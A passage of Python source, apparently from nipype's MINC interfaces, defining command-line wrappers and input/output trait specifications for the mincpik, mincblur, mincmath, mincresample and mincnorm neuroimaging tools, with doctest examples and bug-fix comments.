    output_file = File(desc="output image", exists=True)
class Pik(CommandLine):
    """Interface to ``mincpik``: generate images from MINC files.

    Mincpik uses Imagemagick to generate images
    from Minc files.

    Examples
    --------
    >>> from nipype.interfaces.minc import Pik
    >>> from nipype.interfaces.minc.testdata import nonempty_minc_data
    >>> file0 = nonempty_minc_data(0)
    >>> pik = Pik(input_file=file0, title='foo')
    >>> pik.run() # doctest: +SKIP
    """

    _cmd = "mincpik"
    input_spec = PikInputSpec
    output_spec = PikOutputSpec

    def _format_arg(self, name, spec, value):
        # "title" accepts either a plain flag (bool) or a title string; all
        # other traits use the default formatting.
        if name == "title":
            if isinstance(value, str):
                return f"--title --title_text {value}"
            if isinstance(value, bool) and value:
                return "--title"
            raise ValueError('Unknown value for "title" argument: ' + str(value))
        return super()._format_arg(name, spec, value)
class BlurInputSpec(CommandLineInputSpec):
    """Input trait specification for :class:`Blur` (``mincblur``).

    Exactly one of ``fwhm``, ``fwhm3d`` or ``standard_dev`` must be set
    (each is mandatory but the three are mutually exclusive).
    """

    input_file = File(
        desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
    )
    output_file_base = File(desc="output file base", argstr="%s", position=-1)
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    # Mutually exclusive smoothing kernel shapes.
    _xor_kernel = ("gaussian", "rect")
    gaussian = traits.Bool(
        desc="Use a gaussian smoothing kernel (default).",
        argstr="-gaussian",
        xor=_xor_kernel,
    )
    rect = traits.Bool(
        desc="Use a rect (box) smoothing kernel.", argstr="-rect", xor=_xor_kernel
    )
    gradient = traits.Bool(
        desc="Create the gradient magnitude volume as well.", argstr="-gradient"
    )
    partial = traits.Bool(
        desc="Create the partial derivative and gradient magnitude volumes as well.",
        argstr="-partial",
    )
    no_apodize = traits.Bool(
        desc="Do not apodize the data before blurring.", argstr="-no_apodize"
    )
    _xor_main_options = ("fwhm", "fwhm3d", "standard_dev")
    fwhm = traits.Float(
        0,
        desc="Full-width-half-maximum of gaussian kernel. Default value: 0.",
        argstr="-fwhm %s",
        xor=_xor_main_options,
        mandatory=True,
    )
    standard_dev = traits.Float(
        0,
        desc="Standard deviation of gaussian kernel. Default value: 0.",
        argstr="-standarddev %s",
        xor=_xor_main_options,
        mandatory=True,
    )
    fwhm3d = traits.Tuple(
        traits.Float,
        traits.Float,
        traits.Float,
        argstr="-3dfwhm %s %s %s",
        desc=(
            "Full-width-half-maximum of gaussian kernel."
            "Default value: -1.79769e+308 -1.79769e+308 -1.79769e+308."
        ),
        xor=_xor_main_options,
        mandatory=True,
    )
    dimensions = traits.Enum(
        3,
        1,
        2,
        desc="Number of dimensions to blur (either 1,2 or 3). Default value: 3.",
        argstr="-dimensions %s",
    )
class BlurOutputSpec(TraitedSpec):
    """Output trait specification for :class:`Blur` (``mincblur``).

    The derivative files are only produced when the corresponding
    ``gradient``/``partial`` input flags are enabled.
    """

    output_file = File(desc="Blurred output file.", exists=True)
    gradient_dxyz = File(desc="Gradient dxyz.")
    partial_dx = File(desc="Partial gradient dx.")
    partial_dy = File(desc="Partial gradient dy.")
    partial_dz = File(desc="Partial gradient dz.")
    partial_dxyz = File(desc="Partial gradient dxyz.")
class Blur(StdOutCommandLine):
    """
    Convolve an input volume with a Gaussian blurring kernel of
    user-defined width. Optionally, the first partial derivatives
    and the gradient magnitude volume can be calculated.

    Examples
    --------
    >>> from nipype.interfaces.minc import Blur
    >>> from nipype.interfaces.minc.testdata import minc3Dfile

    (1) Blur an input volume with a 6mm fwhm isotropic Gaussian
    blurring kernel:

    >>> blur = Blur(input_file=minc3Dfile, fwhm=6, output_file_base='/tmp/out_6')
    >>> blur.run() # doctest: +SKIP

    mincblur will create /tmp/out_6_blur.mnc.

    (2) Calculate the blurred and gradient magnitude data:

    >>> blur = Blur(input_file=minc3Dfile, fwhm=6, gradient=True, output_file_base='/tmp/out_6')
    >>> blur.run() # doctest: +SKIP

    will create /tmp/out_6_blur.mnc and /tmp/out_6_dxyz.mnc.

    (3) Calculate the blurred data, the partial derivative volumes
    and the gradient magnitude for the same data:

    >>> blur = Blur(input_file=minc3Dfile, fwhm=6, partial=True, output_file_base='/tmp/out_6')
    >>> blur.run() # doctest: +SKIP

    will create /tmp/out_6_blur.mnc, /tmp/out_6_dx.mnc,
    /tmp/out_6_dy.mnc, /tmp/out_6_dz.mnc and /tmp/out_6_dxyz.mnc.
    """

    input_spec = BlurInputSpec
    output_spec = BlurOutputSpec
    _cmd = "mincblur"

    def _gen_output_base(self):
        """Return the basename mincblur prefixes its outputs with: either the
        user-supplied ``output_file_base`` or ``<cwd>/<input stem>_bluroutput``."""
        output_file_base = self.inputs.output_file_base

        if isdefined(output_file_base):
            return output_file_base
        else:
            base_file_name = os.path.split(self.inputs.input_file)[1]  # e.g. 'foo.mnc'
            base_file_name_no_ext = os.path.splitext(base_file_name)[0]  # e.g. 'foo'
            output_base = os.path.join(
                os.getcwd(), base_file_name_no_ext + "_bluroutput"
            )  # e.g. '/tmp/blah/foo_bluroutput'
            # return os.path.splitext(self.inputs.input_file)[0] +
            # '_bluroutput'
            return output_base

    def _list_outputs(self):
        """Map the derived output basename onto the files mincblur writes."""
        outputs = self.output_spec().get()

        output_file_base = self._gen_output_base()

        outputs["output_file"] = output_file_base + "_blur.mnc"

        # Fix: check the flag's *value*, not just whether it is defined --
        # isdefined() alone is True for an explicit gradient=False/partial=False,
        # which would advertise derivative files mincblur never writes.
        if isdefined(self.inputs.gradient) and self.inputs.gradient:
            outputs["gradient_dxyz"] = output_file_base + "_dxyz.mnc"

        if isdefined(self.inputs.partial) and self.inputs.partial:
            outputs["partial_dx"] = output_file_base + "_dx.mnc"
            outputs["partial_dy"] = output_file_base + "_dy.mnc"
            outputs["partial_dz"] = output_file_base + "_dz.mnc"
            outputs["partial_dxyz"] = output_file_base + "_dxyz.mnc"

        return outputs

    @property
    def cmdline(self):
        output_file_base = self.inputs.output_file_base
        orig_cmdline = super().cmdline

        if isdefined(output_file_base):
            return orig_cmdline
        else:
            # FIXME this seems like a bit of a hack. Can we force output_file
            # to show up in cmdline by default, even if it isn't specified in
            # the instantiation of Blur?
            return f"{orig_cmdline} {self._gen_output_base()}"
class MathInputSpec(CommandLineInputSpec):
    """Input specification for :class:`Math` (``mincmath``).

    The class-level name lists (``bool_or_const_traits``,
    ``single_volume_traits``, ``two_volume_traits``, ``n_volume_traits``)
    group the operation traits by how many input volumes each operation
    accepts; ``Math._format_arg`` and ``Math._parse_inputs`` consume them
    for argument formatting and validation.
    """
    _xor_input_files = ("input_files", "filelist")
    input_files = InputMultiPath(
        File(exists=True),
        desc="input file(s) for calculation",
        mandatory=True,
        sep=" ",
        argstr="%s",
        position=-2,
        xor=_xor_input_files,
    )
    output_file = File(
        desc="output file",
        argstr="%s",
        genfile=True,
        position=-1,
        name_source=["input_files"],
        hash_files=False,
        name_template="%s_mincmath.mnc",
    )
    filelist = File(
        desc="Specify the name of a file containing input file names.",
        argstr="-filelist %s",
        exists=True,
        mandatory=True,
        xor=_xor_input_files,
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    two = traits.Bool(desc="Create a MINC 2 output file.", argstr="-2")
    _xor_copy_header = ("copy_header", "no_copy_header")
    copy_header = traits.Bool(
        desc="Copy all of the header from the first file (default for one file).",
        argstr="-copy_header",
        xor=_xor_copy_header,
    )
    no_copy_header = traits.Bool(
        desc="Do not copy all of the header from the first file (default for many files)).",
        argstr="-nocopy_header",
        xor=_xor_copy_header,
    )
    _xor_format = (
        "format_filetype",
        "format_byte",
        "format_short",
        "format_int",
        "format_long",
        "format_float",
        "format_double",
        "format_signed",
        "format_unsigned",
    )
    format_filetype = traits.Bool(
        desc="Use data type of first file (default).",
        argstr="-filetype",
        xor=_xor_format,
    )
    format_byte = traits.Bool(
        desc="Write out byte data.", argstr="-byte", xor=_xor_format
    )
    format_short = traits.Bool(
        desc="Write out short integer data.", argstr="-short", xor=_xor_format
    )
    format_int = traits.Bool(
        desc="Write out 32-bit integer data.", argstr="-int", xor=_xor_format
    )
    format_long = traits.Bool(
        desc="Superseded by -int.", argstr="-long", xor=_xor_format
    )
    format_float = traits.Bool(
        desc="Write out single-precision floating-point data.",
        argstr="-float",
        xor=_xor_format,
    )
    format_double = traits.Bool(
        desc="Write out double-precision floating-point data.",
        argstr="-double",
        xor=_xor_format,
    )
    format_signed = traits.Bool(
        desc="Write signed integer data.", argstr="-signed", xor=_xor_format
    )
    format_unsigned = traits.Bool(
        desc="Write unsigned integer data (default).",
        argstr="-unsigned",
        xor=_xor_format,
    )
    voxel_range = traits.Tuple(
        traits.Int,
        traits.Int,
        argstr="-range %d %d",
        desc="Valid range for output data.",
    )
    max_buffer_size_in_kb = traits.Range(
        low=0,
        desc="Specify the maximum size of the internal buffers (in kbytes).",
        value=4096,
        usedefault=True,
        argstr="-max_buffer_size_in_kb %d",
    )
    _xor_check_dimensions = ("check_dimensions", "no_check_dimensions")
    check_dimensions = traits.Bool(
        desc="Check that dimension info matches across files (default).",
        argstr="-check_dimensions",
        xor=_xor_check_dimensions,
    )
    no_check_dimensions = traits.Bool(
        desc="Do not check dimension info.",
        argstr="-nocheck_dimensions",
        xor=_xor_check_dimensions,
    )
    dimension = traits.Str(
        desc="Specify a dimension along which we wish to perform a calculation.",
        argstr="-dimension %s",
    )
    # FIXME Is it sensible to use ignore_nan and propagate_nan at the same
    # time? Document this.
    ignore_nan = traits.Bool(
        desc="Ignore invalid data (NaN) for accumulations.", argstr="-ignore_nan"
    )
    propagate_nan = traits.Bool(
        desc="Invalid data in any file at a voxel produces a NaN (default).",
        argstr="-propagate_nan",
    )
    # FIXME Double-check that these are mutually exclusive?
    # BUG FIX: the xor group previously named "output_illegal_value", which is
    # not a trait on this class -- the trait is called "output_illegal", so the
    # mutual exclusion never applied to it.
    _xor_nan_zero_illegal = ("output_nan", "output_zero", "output_illegal")
    output_nan = traits.Bool(
        desc="Output NaN when an illegal operation is done (default).",
        argstr="-nan",
        xor=_xor_nan_zero_illegal,
    )
    output_zero = traits.Bool(
        desc="Output zero when an illegal operation is done.",
        argstr="-zero",
        xor=_xor_nan_zero_illegal,
    )
    output_illegal = traits.Bool(
        desc=(
            "Value to write out when an illegal operation"
            "is done. Default value: 1.79769e+308"
        ),
        argstr="-illegal_value",
        xor=_xor_nan_zero_illegal,
    )
    # FIXME A whole bunch of the parameters will be mutually exclusive, e.g. surely can't do sqrt and abs at the same time?
    # Or does mincmath do one and then the next?
    ##########################################################################
    # Traits that expect a bool (compare two volumes) or constant (manipulate one volume) #
    ##########################################################################
    bool_or_const_traits = [
        "test_gt",
        "test_lt",
        "test_eq",
        "test_ne",
        "test_ge",
        "test_le",
        "calc_add",
        "calc_sub",
        "calc_mul",
        "calc_div",
    ]
    test_gt = traits.Either(
        traits.Bool(),
        traits.Float(),
        desc="Test for vol1 > vol2 or vol1 > constant.",
        argstr="-gt",
    )
    test_lt = traits.Either(
        traits.Bool(),
        traits.Float(),
        desc="Test for vol1 < vol2 or vol1 < constant.",
        argstr="-lt",
    )
    test_eq = traits.Either(
        traits.Bool(),
        traits.Float(),
        desc="Test for integer vol1 == vol2 or vol1 == constant.",
        argstr="-eq",
    )
    test_ne = traits.Either(
        traits.Bool(),
        traits.Float(),
        desc="Test for integer vol1 != vol2 or vol1 != const.",
        argstr="-ne",
    )
    test_ge = traits.Either(
        traits.Bool(),
        traits.Float(),
        desc="Test for vol1 >= vol2 or vol1 >= const.",
        argstr="-ge",
    )
    test_le = traits.Either(
        traits.Bool(),
        traits.Float(),
        desc="Test for vol1 <= vol2 or vol1 <= const.",
        argstr="-le",
    )
    calc_add = traits.Either(
        traits.Bool(),
        traits.Float(),
        desc="Add N volumes or volume + constant.",
        argstr="-add",
    )
    calc_sub = traits.Either(
        traits.Bool(),
        traits.Float(),
        desc="Subtract 2 volumes or volume - constant.",
        argstr="-sub",
    )
    calc_mul = traits.Either(
        traits.Bool(),
        traits.Float(),
        desc="Multiply N volumes or volume * constant.",
        argstr="-mult",
    )
    calc_div = traits.Either(
        traits.Bool(),
        traits.Float(),
        desc="Divide 2 volumes or volume / constant.",
        argstr="-div",
    )
    ######################################
    # Traits that expect a single volume #
    ######################################
    single_volume_traits = [
        "invert",
        "calc_not",
        "sqrt",
        "square",
        "abs",
        "exp",
        "log",
        "scale",
        "clamp",
        "segment",
        "nsegment",
        "isnan",
        "nisnan",  # BUG FIX: was a duplicate "isnan"; "nisnan" was never validated.
    ]  # FIXME enforce this in _parse_inputs and check for other members
    invert = traits.Either(
        traits.Float(), desc="Calculate 1/c.", argstr="-invert -const %s"
    )
    calc_not = traits.Bool(desc="Calculate !vol1.", argstr="-not")
    sqrt = traits.Bool(desc="Take square root of a volume.", argstr="-sqrt")
    square = traits.Bool(desc="Take square of a volume.", argstr="-square")
    abs = traits.Bool(desc="Take absolute value of a volume.", argstr="-abs")
    exp = traits.Tuple(
        traits.Float,
        traits.Float,
        argstr="-exp -const2 %s %s",
        desc="Calculate c2*exp(c1*x). Both constants must be specified.",
    )
    log = traits.Tuple(
        traits.Float,
        traits.Float,
        argstr="-log -const2 %s %s",
        desc="Calculate log(x/c2)/c1. The constants c1 and c2 default to 1.",
    )
    scale = traits.Tuple(
        traits.Float,
        traits.Float,
        argstr="-scale -const2 %s %s",
        desc="Scale a volume: volume * c1 + c2.",
    )
    clamp = traits.Tuple(
        traits.Float,
        traits.Float,
        argstr="-clamp -const2 %s %s",
        desc="Clamp a volume to lie between two values.",
    )
    segment = traits.Tuple(
        traits.Float,
        traits.Float,
        argstr="-segment -const2 %s %s",
        desc="Segment a volume using range of -const2: within range = 1, outside range = 0.",
    )
    nsegment = traits.Tuple(
        traits.Float,
        traits.Float,
        argstr="-nsegment -const2 %s %s",
        desc="Opposite of -segment: within range = 0, outside range = 1.",
    )
    isnan = traits.Bool(desc="Test for NaN values in vol1.", argstr="-isnan")
    nisnan = traits.Bool(desc="Negation of -isnan.", argstr="-nisnan")
    ############################################
    # Traits that expect precisely two volumes #
    ############################################
    two_volume_traits = ["percentdiff"]
    percentdiff = traits.Float(
        desc="Percent difference between 2 volumes, thresholded (const def=0.0).",
        argstr="-percentdiff",
    )
    #####################################
    # Traits that expect N >= 1 volumes #
    #####################################
    # NOTE(review): "calc_and" exists below but is absent from this list --
    # confirm whether it should also be validated as an N-volume operation.
    n_volume_traits = ["count_valid", "maximum", "minimum", "calc_add", "calc_or"]
    count_valid = traits.Bool(
        desc="Count the number of valid values in N volumes.", argstr="-count_valid"
    )
    maximum = traits.Bool(desc="Find maximum of N volumes.", argstr="-maximum")
    minimum = traits.Bool(desc="Find minimum of N volumes.", argstr="-minimum")
    calc_and = traits.Bool(desc="Calculate vol1 && vol2 (&& ...).", argstr="-and")
    calc_or = traits.Bool(desc="Calculate vol1 || vol2 (|| ...).", argstr="-or")
class MathOutputSpec(TraitedSpec):
    """Output specification for :class:`Math` (``mincmath``)."""
    output_file = File(desc="output file", exists=True)
class Math(StdOutCommandLine):
    """
    Various mathematical operations supplied by mincmath.
    Examples
    --------
    >>> from nipype.interfaces.minc import Math
    >>> from nipype.interfaces.minc.testdata import minc2Dfile
    Scale: volume*3.0 + 2:
    >>> scale = Math(input_files=[minc2Dfile], scale=(3.0, 2))
    >>> scale.run() # doctest: +SKIP
    Test if >= 1.5:
    >>> gt = Math(input_files=[minc2Dfile], test_gt=1.5)
    >>> gt.run() # doctest: +SKIP
    """

    input_spec = MathInputSpec
    output_spec = MathOutputSpec
    _cmd = "mincmath"

    def _format_arg(self, name, spec, value):
        """Format bool-or-constant operations: a bare True emits just the
        flag (two-volume form); a float emits the flag plus ``-const``
        (one-volume form)."""
        assert value is not None
        if name not in self.input_spec.bool_or_const_traits:
            return super()._format_arg(name, spec, value)
        if isinstance(value, bool):
            if value:
                return spec.argstr
            raise ValueError(f"Does not make sense to specify {name}=False")
        if isinstance(value, float):
            return f"{spec.argstr} -const {value}"
        raise ValueError(f"Invalid {name} argument: {value}")

    def _parse_inputs(self):
        """A number of the command line options expect precisely one or two files."""
        nr_input_files = len(self.inputs.input_files)
        # Bool form compares two volumes; float form operates on one.
        for name in self.input_spec.bool_or_const_traits:
            value = getattr(self.inputs, name)
            if not isdefined(value):
                continue
            if isinstance(value, bool):
                if nr_input_files != 2:
                    raise ValueError(
                        "Due to the %s option we expected 2 files but input_files is of length %d"
                        % (name, nr_input_files)
                    )
            elif isinstance(value, float):
                if nr_input_files != 1:
                    raise ValueError(
                        "Due to the %s option we expected 1 file but input_files is of length %d"
                        % (name, nr_input_files)
                    )
            else:
                raise ValueError(
                    "Argument should be a bool or const, but got: %s" % value
                )
        for name in self.input_spec.single_volume_traits:
            if isdefined(getattr(self.inputs, name)) and nr_input_files != 1:
                raise ValueError(
                    "Due to the %s option we expected 1 file but input_files is of length %d"
                    % (name, nr_input_files)
                )
        for name in self.input_spec.two_volume_traits:
            if isdefined(getattr(self.inputs, name)) and nr_input_files != 2:
                raise ValueError(
                    "Due to the %s option we expected 2 files but input_files is of length %d"
                    % (name, nr_input_files)
                )
        for name in self.input_spec.n_volume_traits:
            if isdefined(getattr(self.inputs, name)) and nr_input_files < 1:
                raise ValueError(
                    "Due to the %s option we expected at least one file but input_files is of length %d"
                    % (name, nr_input_files)
                )
        return super()._parse_inputs()
class ResampleInputSpec(CommandLineInputSpec):
    """Input specification for :class:`Resample` (``mincresample``).

    not implemented:
    -size:                synonym for -nelements)
    -xsize:               synonym for -xnelements
    -ysize:               synonym for -ynelements
    -zsize:               synonym for -znelements
    """
    input_file = File(
        desc="input file for resampling",
        exists=True,
        mandatory=True,
        argstr="%s",
        position=-2,
    )
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["input_file"],
        hash_files=False,
        name_template="%s_resample.mnc",
    )
    # This is a dummy input.
    input_grid_files = InputMultiPath(File, desc="input grid file(s)")
    two = traits.Bool(desc="Create a MINC 2 output file.", argstr="-2")
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    _xor_interpolation = (
        "trilinear_interpolation",
        "tricubic_interpolation",
        "nearest_neighbour_interpolation",
        "sinc_interpolation",
    )
    trilinear_interpolation = traits.Bool(
        desc="Do trilinear interpolation.", argstr="-trilinear", xor=_xor_interpolation
    )
    tricubic_interpolation = traits.Bool(
        desc="Do tricubic interpolation.", argstr="-tricubic", xor=_xor_interpolation
    )
    nearest_neighbour_interpolation = traits.Bool(
        desc="Do nearest neighbour interpolation.",
        argstr="-nearest_neighbour",
        xor=_xor_interpolation,
    )
    sinc_interpolation = traits.Bool(
        desc="Do windowed sinc interpolation.", argstr="-sinc", xor=_xor_interpolation
    )
    half_width_sinc_window = traits.Enum(
        5,
        1,
        2,
        3,
        4,
        6,
        7,
        8,
        9,
        10,
        desc="Set half-width of sinc window (1-10). Default value: 5.",
        argstr="-width %s",
        requires=["sinc_interpolation"],
    )
    _xor_sinc_window_type = ("sinc_window_hanning", "sinc_window_hamming")
    sinc_window_hanning = traits.Bool(
        desc="Set sinc window type to Hanning.",
        argstr="-hanning",
        xor=_xor_sinc_window_type,
        requires=["sinc_interpolation"],
    )
    sinc_window_hamming = traits.Bool(
        desc="Set sinc window type to Hamming.",
        argstr="-hamming",
        xor=_xor_sinc_window_type,
        requires=["sinc_interpolation"],
    )
    transformation = File(
        desc="File giving world transformation. (Default = identity).",
        exists=True,
        argstr="-transformation %s",
    )
    invert_transformation = traits.Bool(
        desc="Invert the transformation before using it.",
        argstr="-invert_transformation",
    )
    _xor_input_sampling = ("vio_transform", "no_input_sampling")
    vio_transform = traits.Bool(
        desc="VIO_Transform the input sampling with the transform (default).",
        argstr="-tfm_input_sampling",
        xor=_xor_input_sampling,
    )
    no_input_sampling = traits.Bool(
        desc="Use the input sampling without transforming (old behaviour).",
        argstr="-use_input_sampling",
        xor=_xor_input_sampling,
    )
    like = File(
        desc="Specifies a model file for the resampling.",
        argstr="-like %s",
        exists=True,
    )
    _xor_format = (
        "format_byte",
        "format_short",
        "format_int",
        "format_long",
        "format_float",
        "format_double",
        "format_signed",
        "format_unsigned",
    )
    format_byte = traits.Bool(
        desc="Write out byte data.", argstr="-byte", xor=_xor_format
    )
    format_short = traits.Bool(
        desc="Write out short integer data.", argstr="-short", xor=_xor_format
    )
    format_int = traits.Bool(
        desc="Write out 32-bit integer data.", argstr="-int", xor=_xor_format
    )
    format_long = traits.Bool(
        desc="Superseded by -int.", argstr="-long", xor=_xor_format
    )
    format_float = traits.Bool(
        desc="Write out single-precision floating-point data.",
        argstr="-float",
        xor=_xor_format,
    )
    format_double = traits.Bool(
        desc="Write out double-precision floating-point data.",
        argstr="-double",
        xor=_xor_format,
    )
    format_signed = traits.Bool(
        desc="Write signed integer data.", argstr="-signed", xor=_xor_format
    )
    format_unsigned = traits.Bool(
        desc="Write unsigned integer data (default).",
        argstr="-unsigned",
        xor=_xor_format,
    )
    output_range = traits.Tuple(
        traits.Float,
        traits.Float,
        argstr="-range %s %s",
        desc="Valid range for output data. Default value: -1.79769e+308 -1.79769e+308.",
    )
    # BUG FIX: the xor group must list the actual trait names; it previously
    # named "transverse"/"sagittal"/"coronal", which are not traits here, so
    # the mutual exclusion never applied.
    _xor_slices = ("transverse_slices", "sagittal_slices", "coronal_slices")
    transverse_slices = traits.Bool(
        desc="Write out transverse slices.", argstr="-transverse", xor=_xor_slices
    )
    sagittal_slices = traits.Bool(
        desc="Write out sagittal slices", argstr="-sagittal", xor=_xor_slices
    )
    coronal_slices = traits.Bool(
        desc="Write out coronal slices", argstr="-coronal", xor=_xor_slices
    )
    # BUG FIX: was ("nofill", "fill") but the trait is named "no_fill".
    _xor_fill = ("no_fill", "fill")
    no_fill = traits.Bool(
        desc="Use value zero for points outside of input volume.",
        argstr="-nofill",
        xor=_xor_fill,
    )
    fill = traits.Bool(
        desc="Use a fill value for points outside of input volume.",
        argstr="-fill",
        xor=_xor_fill,
    )
    fill_value = traits.Float(
        desc=(
            "Specify a fill value for points outside of input volume."
            "Default value: 1.79769e+308."
        ),
        argstr="-fillvalue %s",
        requires=["fill"],
    )
    _xor_scale = ("keep_real_range", "nokeep_real_range")
    keep_real_range = traits.Bool(
        desc="Keep the real scale of the input volume.",
        argstr="-keep_real_range",
        xor=_xor_scale,
    )
    nokeep_real_range = traits.Bool(
        desc="Do not keep the real scale of the data (default).",
        argstr="-nokeep_real_range",
        xor=_xor_scale,
    )
    # NOTE(review): _xor_spacetype is declared but not attached to either
    # trait below -- confirm whether spacetype/talairach should be exclusive.
    _xor_spacetype = ("spacetype", "talairach")
    spacetype = traits.Str(
        desc="Set the spacetype attribute to a specified string.",
        argstr="-spacetype %s",
    )
    talairach = traits.Bool(desc="Output is in Talairach space.", argstr="-talairach")
    origin = traits.Tuple(
        traits.Float,
        traits.Float,
        traits.Float,
        desc=(
            "Origin of first pixel in 3D space."
            "Default value: 1.79769e+308 1.79769e+308 1.79769e+308."
        ),
        argstr="-origin %s %s %s",
    )
    standard_sampling = traits.Bool(
        desc="Set the sampling to standard values (step, start and dircos).",
        argstr="-standard_sampling",
    )  # FIXME Bool?
    units = traits.Str(
        desc="Specify the units of the output sampling.", argstr="-units %s"
    )  # FIXME String?
    # Elements along each dimension.
    # FIXME Ints? Ranges?
    # FIXME Check that this xor behaves correctly.
    _xor_nelements = ("nelements", "nelements_x_y_or_z")
    # nr elements along each dimension
    nelements = traits.Tuple(
        traits.Int,
        traits.Int,
        traits.Int,
        desc="Number of elements along each dimension (X, Y, Z).",
        argstr="-nelements %s %s %s",
        xor=_xor_nelements,
    )
    # FIXME Is mincresample happy if we only specify one of these, or do we
    # need the requires=...?
    xnelements = traits.Int(
        desc="Number of elements along the X dimension.",
        argstr="-xnelements %s",
        requires=("ynelements", "znelements"),
        xor=_xor_nelements,
    )
    ynelements = traits.Int(
        desc="Number of elements along the Y dimension.",
        argstr="-ynelements %s",
        requires=("xnelements", "znelements"),
        xor=_xor_nelements,
    )
    znelements = traits.Int(
        desc="Number of elements along the Z dimension.",
        argstr="-znelements %s",
        requires=("xnelements", "ynelements"),
        xor=_xor_nelements,
    )
    # step size along each dimension
    _xor_step = ("step", "step_x_y_or_z")
    step = traits.Tuple(
        traits.Int,
        traits.Int,
        traits.Int,
        desc="Step size along each dimension (X, Y, Z). Default value: (0, 0, 0).",
        argstr="-step %s %s %s",
        xor=_xor_step,  # BUG FIX: was _xor_nelements (copy-paste error).
    )
    # FIXME Use the requires=...?
    xstep = traits.Int(
        desc="Step size along the X dimension. Default value: 0.",
        argstr="-xstep %s",
        requires=("ystep", "zstep"),
        xor=_xor_step,
    )
    ystep = traits.Int(
        desc="Step size along the Y dimension. Default value: 0.",
        argstr="-ystep %s",
        requires=("xstep", "zstep"),
        xor=_xor_step,
    )
    zstep = traits.Int(
        desc="Step size along the Z dimension. Default value: 0.",
        argstr="-zstep %s",
        requires=("xstep", "ystep"),
        xor=_xor_step,
    )
    # start point along each dimension
    _xor_start = ("start", "start_x_y_or_z")
    start = traits.Tuple(
        traits.Float,
        traits.Float,
        traits.Float,
        desc=(
            "Start point along each dimension (X, Y, Z)."
            "Default value: 1.79769e+308 1.79769e+308 1.79769e+308."
        ),
        argstr="-start %s %s %s",
        xor=_xor_start,  # BUG FIX: was _xor_nelements (copy-paste error).
    )
    # FIXME Use the requires=...?
    xstart = traits.Float(
        desc="Start point along the X dimension. Default value: 1.79769e+308.",
        argstr="-xstart %s",
        requires=("ystart", "zstart"),
        xor=_xor_start,
    )
    ystart = traits.Float(
        desc="Start point along the Y dimension. Default value: 1.79769e+308.",
        argstr="-ystart %s",
        requires=("xstart", "zstart"),
        xor=_xor_start,
    )
    zstart = traits.Float(
        desc="Start point along the Z dimension. Default value: 1.79769e+308.",
        argstr="-zstart %s",
        requires=("xstart", "ystart"),
        xor=_xor_start,
    )
    # dircos along each dimension
    _xor_dircos = ("dircos", "dircos_x_y_or_z")
    dircos = traits.Tuple(
        traits.Float,
        traits.Float,
        traits.Float,
        desc=(
            "Direction cosines along each dimension (X, Y, Z). Default value:"
            "1.79769e+308 1.79769e+308 1.79769e+308 1.79769e+308 ..."
            " 1.79769e+308 1.79769e+308 1.79769e+308 1.79769e+308 1.79769e+308."
        ),
        argstr="-dircos %s %s %s",
        xor=_xor_dircos,  # BUG FIX: was _xor_nelements (copy-paste error).
    )
    # FIXME Use the requires=...?
    xdircos = traits.Float(
        desc=(
            "Direction cosines along the X dimension."
            "Default value: 1.79769e+308 1.79769e+308 1.79769e+308."
        ),
        argstr="-xdircos %s",
        requires=("ydircos", "zdircos"),
        xor=_xor_dircos,
    )
    ydircos = traits.Float(
        desc=(
            "Direction cosines along the Y dimension."
            "Default value: 1.79769e+308 1.79769e+308 1.79769e+308."
        ),
        argstr="-ydircos %s",
        requires=("xdircos", "zdircos"),
        xor=_xor_dircos,
    )
    zdircos = traits.Float(
        desc=(
            "Direction cosines along the Z dimension."
            "Default value: 1.79769e+308 1.79769e+308 1.79769e+308."
        ),
        argstr="-zdircos %s",
        requires=("xdircos", "ydircos"),
        xor=_xor_dircos,
    )
class ResampleOutputSpec(TraitedSpec):
    """Output specification for :class:`Resample` (``mincresample``)."""
    output_file = File(desc="output file", exists=True)
class Resample(StdOutCommandLine):
    """
    Resample a minc file.
    Examples
    --------
    >>> from nipype.interfaces.minc import Resample
    >>> from nipype.interfaces.minc.testdata import minc2Dfile
    >>> r = Resample(input_file=minc2Dfile, output_file='/tmp/out.mnc') # Resample the file.
    >>> r.run() # doctest: +SKIP
    """
    input_spec = ResampleInputSpec
    output_spec = ResampleOutputSpec
    _cmd = "mincresample"
class NormInputSpec(CommandLineInputSpec):
    """Input specification for :class:`Norm` (``mincnorm``).

    Not implemented:
    -version         print version and exit
    -verbose         be verbose
    -noverbose       opposite of -verbose [default]
    -quiet           be quiet
    -noquiet         opposite of -quiet [default]
    -fake            do a dry run, (echo cmds only)
    -nofake          opposite of -fake [default]
    """
    input_file = File(
        desc="input file to normalise",
        exists=True,
        mandatory=True,
        argstr="%s",
        position=-2,
    )
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["input_file"],
        hash_files=False,
        name_template="%s_norm.mnc",
    )
    output_threshold_mask = File(
        desc="File in which to store the threshold mask.",
        argstr="-threshold_mask %s",
        name_source=["input_file"],
        hash_files=False,
        name_template="%s_norm_threshold_mask.mnc",
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    # Normalisation Options
    mask = File(
        desc="Calculate the image normalisation within a mask.",
        argstr="-mask %s",
        exists=True,
    )
    clamp = traits.Bool(
        desc="Force the output range between limits [default].",
        argstr="-clamp",
        usedefault=True,
        default_value=True,
    )
    cutoff = traits.Range(
        low=0.0,
        high=100.0,
        desc="Cutoff value to use to calculate thresholds by a histogram PcT in %. [default: 0.01]",
        argstr="-cutoff %s",
    )
    lower = traits.Float(desc="Lower real value to use.", argstr="-lower %s")
    upper = traits.Float(desc="Upper real value to use.", argstr="-upper %s")
    # BUG FIX: the descriptions of out_floor and out_ceil were swapped --
    # the floor is the output minimum (default 0), the ceiling the maximum
    # (default 100), matching their defaults.
    out_floor = traits.Float(
        desc="Output files minimum [default: 0]", argstr="-out_floor %s"
    )  # FIXME is this a float?
    out_ceil = traits.Float(
        desc="Output files maximum [default: 100]", argstr="-out_ceil %s"
    )  # FIXME is this a float?
    # Threshold Options
    threshold = traits.Bool(
        desc="Threshold the image (set values below threshold_perc to -out_floor).",
        argstr="-threshold",
    )
    threshold_perc = traits.Range(
